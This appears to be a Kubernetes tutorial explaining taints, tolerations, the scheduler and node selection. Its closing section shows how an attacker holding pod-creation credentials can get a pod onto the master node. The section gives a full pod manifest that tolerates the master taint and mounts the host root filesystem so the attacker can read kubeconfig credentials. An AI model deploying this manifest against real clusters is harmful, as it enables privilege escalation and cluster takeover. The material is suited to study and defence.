Understanding Taints and Tolerations
In simple terms:
- Taints: A taint marks a node so that the Kubernetes scheduler will not place pods on it unless those pods tolerate the taint.
- Tolerations: A toleration on a pod allows (but does not require) the scheduler to place that pod on nodes that carry a matching taint.
Taints
A taint consists of a key, an optional value, and an effect. The effect takes one of three possible values:
- NoSchedule: Pods that do not tolerate the taint will not be scheduled to nodes marked with it.
- PreferNoSchedule: A softer version of NoSchedule. The scheduler will try to avoid scheduling pods to these nodes, but may still do so.
- NoExecute: This effect prevents new pods from being scheduled and also evicts any pods already running on the node that lack a matching toleration.
To check taints on a node:
kubectl describe node <node-name>
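As a rough illustration of what that command reports, a taint is stored under spec.taints on the Node object. The node name worker-1 and the dedicated=batch key and value below are hypothetical, chosen only for this sketch:

```yaml
# Hypothetical Node excerpt; only the taint-related fields are shown.
apiVersion: v1
kind: Node
metadata:
  name: worker-1          # assumed node name
spec:
  taints:
    - key: dedicated      # assumed key
      value: batch        # assumed value
      effect: NoSchedule  # one of NoSchedule, PreferNoSchedule, NoExecute
```

In the describe output, an entry like this would appear in the Taints field as dedicated=batch:NoSchedule.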
Why Use Taints?
Every request in a Kubernetes cluster goes through the master node's kube-apiserver, making the master node critically important. Typically, application pods are not deployed on master nodes. Applying taints to master nodes prevents ordinary pods from being scheduled to these machines. Tolerations are used when specific pods do need to run on tainted nodes, such as master nodes.
Taint Tolerations
Tolerations are key-value attributes defined on Pod objects that configure which node taints the pod can tolerate. The scheduler will only schedule a Pod to a node if the Pod can tolerate the node's taints.
Taints are defined in the node specification, while tolerations are defined in the pod specification. Both use key-value data structures.
When defining tolerations on a Pod, two operators are supported:
- Equal: Requires exact matches on key, value, and effect.
- Exists: Requires matching key and effect, but the value field must be empty.
For example, if a node has a NoSchedule taint, pods cannot be scheduled to it by default. A pod with a matching toleration may still be scheduled to that node. Unlike affinity, however, a toleration only permits the placement; it does not steer the pod toward the node.
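The two operators could look like this in a Pod specification. This is a minimal sketch: the Pod name, the image, and the dedicated=batch taint are assumptions made for illustration.

```yaml
# Hypothetical Pod; its name, image, and the dedicated=batch taint are assumptions.
apiVersion: v1
kind: Pod
metadata:
  name: toleration-demo
spec:
  tolerations:
    # Equal: key, value, and effect must all match the node's taint.
    - key: dedicated
      operator: Equal
      value: batch
      effect: NoSchedule
    # Exists: only key and effect are compared, so value is omitted.
    - key: node-role.kubernetes.io/master
      operator: Exists
      effect: NoSchedule
  containers:
    - name: app
      image: busybox
      command: ["sleep", "3600"]
```

With both entries present, this Pod would be allowed on nodes carrying either taint, though the scheduler remains free to place it elsewhere.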
The Kubernetes Scheduler
The kube-scheduler is Kubernetes' default scheduler and part of the cluster control plane (master). For every newly created or unscheduled Pod, the kube-scheduler selects the optimal Node to run the Pod. Each container in a Pod has different resource requirements, and the Pod itself has specific needs. Before scheduling a Pod to a Node, the scheduler filters available Nodes based on these resource requirements.
Scheduler Function
When a pod is created, the creation request is submitted to the API server. After authentication and authorization, the API server stores the pod object in etcd. The scheduler, which watches the API server through the list-watch mechanism, notices the unscheduled pod, applies its scheduling algorithms to select a node, and records the assignment through the API server, which persists it in etcd. Finally, the kubelet on the selected node observes the assignment and creates the containers.
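One way to picture the assignment step is as a Binding object that the scheduler submits to the API server, after which the Pod's spec.nodeName is set to the chosen node. The following is only a sketch; the Pod and node names are hypothetical.

```yaml
# Sketch of the binding a scheduler submits for a Pod; all names are hypothetical.
apiVersion: v1
kind: Binding
metadata:
  name: example-pod       # name of the Pod being bound (assumed)
  namespace: default
target:
  apiVersion: v1
  kind: Node
  name: worker-1          # node selected by the scheduler (assumed)
```

The kubelet on worker-1 would then see a Pod whose spec.nodeName matches its own node and start the containers.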
Factors Affecting Pod Scheduling
- Pod Resource Requests: The scheduler checks whether each node has sufficient unallocated resources to meet the Pod's requirements, such as its CPU and memory requests.
- Node Selectors (nodeSelector): When creating a pod, node selectors can constrain the pod to run on specific nodes. This is the simplest recommended form of node selection constraint. The nodeSelector field is added to the Pod specification to set the desired node labels. Kubernetes will only schedule Pods to nodes that have all the specified labels.
- Node Affinity (nodeAffinity): Conceptually similar to nodeSelector, node affinity allows constraining Pod scheduling based on node labels. It offers more flexibility than nodeSelector, supporting simple logical combinations rather than just exact matches.
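The three factors above can be combined in a single Pod specification. The sketch below assumes nodes labeled disktype=ssd and a zone label with the values zone-a and zone-b; the labels, names, and resource figures are illustrative, not taken from a real cluster.

```yaml
# Hypothetical Pod showing resource requests, nodeSelector, and nodeAffinity together.
apiVersion: v1
kind: Pod
metadata:
  name: scheduling-demo
spec:
  # nodeSelector: the node must carry every listed label (exact match).
  nodeSelector:
    disktype: ssd                       # assumed node label
  affinity:
    nodeAffinity:
      # Hard requirement expressed with a set-based operator.
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
          - matchExpressions:
              - key: topology.kubernetes.io/zone
                operator: In
                values:
                  - zone-a              # assumed zone names
                  - zone-b
  containers:
    - name: app
      image: busybox
      command: ["sleep", "3600"]
      resources:
        requests:                       # the scheduler filters nodes on these values
          cpu: 250m
          memory: 128Mi
```

Here nodeSelector expresses an exact label match, while the In operator under nodeAffinity accepts any of several label values, which is the kind of logical combination nodeSelector cannot express.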
Exploiting Taints for Master Node Access
Attack Vector
With credentials that have permission to create Pods (typically obtained by escaping from a privileged container to a worker node), an attacker can deploy pods. By default, Pods cannot be scheduled to Master nodes. However, using taint tolerations, an attacker can create a Pod that gets scheduled to a Master node and then escape to the Master.
Default Master Node Taints
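Querying a Master node's details reveals that it is marked with the taint node-role.kubernetes.io/master:NoSchedule (on recent kubeadm-based clusters the key is node-role.kubernetes.io/control-plane instead). This means the scheduler will not place Pods on Master nodes by default, so they do not run ordinary workloads.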
Creating a Tolerated Pod for Master Access
The following YAML creates a Pod with a toleration for the Master node taint, allowing it to be scheduled on the Master:
apiVersion: v1
kind: Pod
metadata:
  name: privileged-master-access
  namespace: default
spec:
  tolerations:
    - key: "node-role.kubernetes.io/master"
      operator: "Exists"
      effect: "NoSchedule"
  volumes:
    - name: host-volume
      hostPath:
        path: /
  containers:
    - name: attacker-container
      image: busybox
      imagePullPolicy: IfNotPresent
      volumeMounts:
        - name: host-volume
          mountPath: /host
      command: ["/bin/sh", "-c", "while true; do echo 'Pod running on master node'; sleep 60; done"]
  serviceAccountName: default
A toleration only permits scheduling on the Master node; it does not force it. By repeatedly creating such Pods, an attacker can eventually get one scheduled on the Master node. Since the container mounts the host's root directory (the Master node's root directory) at /host, the attacker can read and modify the host's filesystem and thereby gain arbitrary control over the host system.
From there, an attacker can read sensitive files such as kubeconfig files, which contain credentials for accessing the Kubernetes cluster.